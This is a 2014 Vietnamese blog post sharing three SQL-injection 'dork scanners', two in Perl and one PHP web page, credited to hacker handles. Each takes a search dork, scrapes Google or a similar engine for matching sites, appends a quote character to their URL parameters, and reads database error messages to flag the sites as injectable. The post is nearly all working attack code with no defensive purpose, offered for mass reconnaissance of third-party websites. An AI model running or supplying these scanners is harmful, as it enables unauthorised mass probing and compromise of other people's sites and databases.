Thứ Sáu, 7 tháng 2, 2014

PERL DORK SCANNER

#!/usr/bin/perl
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. Script : SQLi Vulnerable Scanner .:.
# .:. Version : 3.0 fixed (06/10/2012) .:.
# .:. Author : Metropolis .:.
# .:. Home : https://www1.r00tw0rm.com/ .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# .:. MySQL Injection .:.
# .:. MSAccess Injection .:.
# .:. MSSQL Injection .:.
# .:. Oracle Injection .:.
# .:. Blind Injection .:.
# .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:. .:.
# Useless version :
# http://pastebin.com/kKxCCJuU 1.0
# http://pastebin.com/FyPcTLRw 2.0
use LWP::UserAgent;
use Getopt::Std;
getopt('kpo', \%opts);
if($opts{'k'} eq '')
{
print "[Help] SQLi.pl -k shopping.php?id= -p 500\n"; # Max: 50,100,500,700,etc...
}
if($opts{'p'} eq '')
{
$opts{'p'} = 1;
}
print <<"Metropolis_intro";
___________
|.---------.|
|| ||
|| scanner ||
|| ||
|'---------'|
`)__ ____('
[=== -- o ]--.
__'---------'__ \
[::::::::::: :::] )
`""'"""""'""""`/T\\
\\_/
Metropolis_intro
system('COLOR A');
print "\n\n[Script] SQLi Vulnerable Scanner (MySQL,MSAccess,MSSQL,Oracle,Blind)\n";
print "[Author] Metropolis\n\n\n\n";
for($start = 0;$start != $opts{'p'}*10;$start += 10)
{
$t = "http://www.google.fr/search?hl=fr&q=".$opts{'k'}."&btnG=Search&start=".
$start;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; tr; rv:1.9.2.12)
Gecko/20101026 Firefox/3.6.12 ( .NET CLR 3.5.30729; .NET4.0E");
$response = $ua->get($t);
if ($response->is_success)
{
$c = $response->content;
@stuff = split(/<a href=/,$c);
foreach $line(@stuff)
{
if($line =~/(.*) class=l/ig)
{
$out = $1;
$out =~ s/"//g;
$out =~s/$/\'/;
$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;
$response = $ua->get($out);
$error = $response->content();
if($error =~m/SQL syntax/)
{print "$out Vulnerable MySQL!\n";}
elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft
Access Driver/)
{print "$out Vulnerable MS Access!\n";}
elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error
=~m/Unclosed quotation mark/)
{print "$out Vulnerable MSSQL!\n";}
elsif($error =~m/mysql_fetch_array()/ || $error =~m/mysql_num_rows()/)
{print "$out Vulnerable Blind Possible!\n";}
elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
{print "$out Vulnerable Oracle!\n";}
}
}
}
}

perl2

  1. #!/usr/bin/perl
  2.    use LWP::Simple;
  3.    use LWP::UserAgent;
  4.    use HTTP::Request;
  5.    my $sis="$^O";if ($sis eq 'MSWin32') { system("cls"); } else { system("clear"); }
  6.    print "+++++++++++++++++++++++++++++++\n";
  7.    print "+     SQL - Google Search     +\n";
  8.    print "+       CWH Underground       +\n";
  9.    print "+++++++++++++++++++++++++++++++\n\n";
  10.    print "Insert Dork:";
  11.    chomp( my $dork = <STDIN> );
  12.    print "Total Query Pages (10 Links/Pages) :";
  13.    chomp( my $page = <STDIN> );
  14.    print "\n
  15.     * Result:\n\n";
  16.    for($start = 0;$start != $page*10;$start += 10)
  17.    {  
  18.    $t = "http://www.google.com/search?hl=en&q=".$dork."&btnG=Search&start=".$start;
  19.        $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  20.        $ua->timeout(10);
  21.        $ua->env_proxy;
  22.        $response = $ua->get($t);
  23.        if ($response->is_success)
  24.        {
  25.            $c = $response->content;
  26.            @stuff = split(/<a href=/,$c);
  27.            foreach $line(@stuff)
  28.            {
  29.                if($line =~/(.*) class=l/ig)
  30.                {
  31.                    $out = $1;
  32.                    $out =~ s/\"//g;
  33.          $out =~s/$/\'/;  
  34.          $ua = LWP::UserAgent->new(agent => 'Mozilla 5.2');
  35.          $ua->timeout(10);
  36.          $ua->env_proxy;
  37.          $response = $ua->get($out);
  38.          $error = $response->content();
  39.          if($error =~m/mysql_/ || $error =~m/Division by zero in/ || $error =~m/Warning:/)
  40.             {print "$out => Could be Vulnerable in MySQL Injection!!\n";}
  41.          elsif($error =~m/Microsoft JET Database/ || $error =~m/ODBC Microsoft Access Driver/)
  42.             {print "$out => Could be Vulnerable in MS Access Injection!!\n";}
  43.          elsif($error =~m/Microsoft OLE DB Provider for SQL Server/ || $error =~m/Unclosed quotation mark/)
  44.             {print "$out => Could be Vulnerable in MSSQL Injection!!\n";}
  45.          elsif($error =~m/Microsoft OLE DB Provider for Oracle/)
  46.             {print "$out => Could be Vulnerable in Oracle Injection!!\n";}
  47.           }
  48.       }
  49.        }
  50.         }


php

  1. <php
  2. <html>
  3. <head>
  4. <title>m0bil3_xT's SQLi Scanner</title>
  5. <center><img src="http://i.imgur.com/lH3GO.png">
  6. </center>
  7. </head>
  8. <body bgcolor=#000000>
  9. <style>
  10. body{
  11. font: 10pt Verdana;
  12. }
  13. tr {
  14. BORDER-RIGHT: #3e3e3e 1px solid;
  15. BORDER-TOP: #3e3e3e 1px solid;
  16. BORDER-LEFT: #3e3e3e 1px solid;
  17. BORDER-BOTTOM: #3e3e3e 1px solid;
  18. color: #ff9900;
  19. }
  20. td {
  21. BORDER-RIGHT: #3e3e3e 1px solid;
  22. BORDER-TOP: #3e3e3e 1px solid;
  23. BORDER-LEFT: #3e3e3e 1px solid;
  24. BORDER-BOTTOM: #3e3e3e 1px solid;
  25. color: #2BA8EC;
  26. font: 10pt Verdana;
  27. }
  28. table {
  29. BORDER-RIGHT: #3e3e3e 1px solid;
  30. BORDER-TOP: #3e3e3e 1px solid;
  31. BORDER-LEFT: #3e3e3e 1px solid;
  32. BORDER-BOTTOM: #3e3e3e 1px solid;
  33. BACKGROUND-COLOR: #111;
  34. }
  35. input {
  36. BORDER-RIGHT: #3e3e3e 1px solid;
  37. BORDER-TOP: #3e3e3e 1px solid;
  38. BORDER-LEFT: #3e3e3e 1px solid;
  39. BORDER-BOTTOM: #3e3e3e 1px solid;
  40. BACKGROUND-COLOR: Black;
  41. font: 10pt Verdana;
  42. color: #ff9900;
  43. }
  44. input.submit {
  45. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  46. color: #FFFFFF;
  47. border-color: #009900;
  48. }
  49. code {
  50. border   : dashed 0px #333;
  51. BACKGROUND-COLOR: Black;
  52. font: 10pt Verdana bold;
  53. color: while;
  54. }
  55. run {
  56. border   : dashed 0px #333;
  57. font: 10pt Verdana bold;
  58. color: #FF00AA;
  59. }
  60. textarea {
  61. BORDER-RIGHT: #3e3e3e 1px solid;
  62. BORDER-TOP: #3e3e3e 1px solid;
  63. BORDER-LEFT: #3e3e3e 1px solid;
  64. BORDER-BOTTOM: #3e3e3e 1px solid;
  65. BACKGROUND-COLOR: #1b1b1b;
  66. font: Fixedsys bold;
  67. color: #aaa;
  68. }
  69. A:link {
  70. COLOR: #2BA8EC; TEXT-DECORATION: none
  71. }
  72. A:visited {
  73. COLOR: #2BA8EC; TEXT-DECORATION: none
  74. }
  75. A:hover {
  76. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  77. color: #ff9900; TEXT-DECORATION: none
  78. }
  79. A:active {
  80. color: Red; TEXT-DECORATION: none
  81. }
  82. .listdir tr:hover{
  83. background: #444;
  84. }
  85. .listdir tr:hover td{
  86. background: #444;
  87. text-shadow: 0pt 0pt 0.3em cyan, 0pt 0pt 0.3em cyan;
  88. color: #FFFFFF; TEXT-DECORATION: none;
  89. }
  90. .notline{
  91. background: #111;
  92. }
  93. .line{
  94. background: #222;
  95. }
  96. </style>
  97. <center>
  98. <br/>
  99. <?php
  100. echo "<font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px rgb(300, 0,
  101. 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;' size='5'> </font><br><font style='text-shadow: 0px 0px 6px rgb(255, 0, 0), 0px 0px 5px
  102. rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff; font-weight:bold;'
  103. size='5'></font></b><br><br><center><a href='
  104. target='_blank'></a><br><a</a></center><br></font><center><font style='text-shadow: 0px 0px 6px rgb(255, 0,
  105. 0), 0px 0px 5px rgb(300, 0, 0), 0px 0px 5px rgb(300, 0, 0); color:#ffffff;
  106. font-weight:bold;' size='2'></font><br><br></center>";
  107. $your_ip        = $_SERVER['REMOTE_ADDR'];
  108. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
  109. size='2'>Your IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
  110. font-weight:bold;' color=#FF0000 size='2'>$your_ip</font><br>";
  111. $server_ip = @gethostbyname($_SERVER["HTTP_HOST"]);
  112. echo "<font style='text-shadow:0px 0px 10px #12E12E; font-weight:bold;' color=#FF0000
  113. size='2'>Server IP : </font><font style='text-shadow:0px 0px 10px #12E12E;
  114. font-weight:bold;' color=#FF0000 size='2'>$server_ip </font><br><br>";
  115. echo '<form method="post" action=""><font color="red">Dork :</font> <input type="text"
  116. value="" name="dork" size="20"/><input type="submit" name="scan"
  117. value="Scan"></form></center>';
  118. ob_start();
  119. set_time_limit(0);
  120. if (isset($_POST['scan'])) {
  121. $browser = $_SERVER['HTTP_USER_AGENT'];
  122. $first = "startgoogle.startpagina.nl/index.php?q=";
  123. $sec = "&start=";
  124. $reg = '/<p class="g"><a href="(.*)" target="_self" onclick="/';
  125. for($id=0 ; $id<=30; $id++){
  126. $page=$id*10;
  127. $dork=urlencode($_POST['dork']);
  128. $url = $first.$dork.$sec.$page;
  129. $curl = curl_init($url);
  130. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  131. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  132. $result = curl_exec($curl);
  133. curl_close($curl);
  134. preg_match_all($reg,$result,$matches);
  135. foreach($matches[1] as $site){
  136. $url = preg_replace("/=/", "='", $site);
  137. $curl=curl_init();
  138. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  139. curl_setopt($curl,CURLOPT_URL,$url);
  140. curl_setopt($curl,CURLOPT_USERAGENT,'$browser)');
  141. curl_setopt($curl,CURLOPT_TIMEOUT,'5');
  142. $GET=curl_exec($curl);
  143. if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute
  144. query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch&#8203;_row
  145. ()|SELECT *
  146. FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i",$GET)) {
  147. echo '<center><b><font color="#E10000">Found : </font><a href="'.$url.'"
  148. target="_blank">'.$url.'</a><font color=#FF0000> &#60;-- SQLI Vuln
  149. Found..</font></b></center>';
  150. ob_flush();flush();
  151. }else{
  152. echo '<center><font color="#FFFFFF"><b>'.$url.'</b></font><font color="#0FFF16">
  153. &#60;-- Not Vuln</font></center>';
  154. ob_flush();flush();
  155. }
  156. ob_flush();flush();
  157. }
  158. ob_flush();flush();
  159. }
  160. ob_flush();flush();
  161. }
  162. ?>
  163. </body>
  164. </html>

Không có nhận xét nào:

Đăng nhận xét